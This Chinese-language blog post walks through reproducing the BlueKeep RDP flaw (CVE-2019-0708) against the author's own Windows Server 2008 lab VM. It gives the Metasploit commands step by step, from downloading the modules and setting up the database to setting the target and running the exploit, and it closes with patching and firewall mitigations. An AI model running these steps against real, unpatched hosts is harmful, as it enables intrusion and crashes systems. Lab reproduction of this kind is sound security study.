CVE-2019-0708漏洞利用(测试)

这几天关于0708漏洞的复现也是沸沸扬扬的,刚好趁着今天有时间自己来操作一波,此次操作的靶机和攻击机都是本人自己搭建的虚拟环境,本教程仅供学习交流~~~

漏洞复现

影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7

攻击机:kali系统 ip地址:192.168.107.128在这里插入图片描述
被攻击机:Windows Server 2008 R2 Standard ip地址:192.168.107.145在这里插入图片描述
这里08的系统是我自己在网上下载的,默认也是就打了40个补丁,可以通过systeminfo查看补丁情况,由于都是在虚拟机中搭建的,所以网络设置为NAT模式,保证kali和win2008在同一网段中可以ping通。
在kali中启动msf,输入命令:msfconsole
利用wget 下载0708四件套:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

msf启动的时候会提示:No database support: No database YAML file,说明数据库没启动,运行如下命令即可:

systemctl start postgresql
systemctl enable postgresql
msfdb inti

在msf中reload_all重载ms模块
搜索0708的攻击内核模块:search bluekeep / search 0708
在这里插入图片描述
选择攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
查看exploit设置:show options
在这里是是插入图片描述这里rhosts就是目标机器的IP地址
设置攻击目标:set rhosts 192.168.107.145
在这里插入图片描述
查看目标环境:show targets
在这里插入图片描述
选择目标环境:set target ?这里?是需要选择的环境类型在这里插入图片描述
开始攻击:run/exploit
这里作者在自己08系统和03中测试一直是蓝屏状态,但是看网上有其他作者复现的是直接可以返回session。

漏洞的修复

  1. 及时打对应系统的安全补丁
  2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值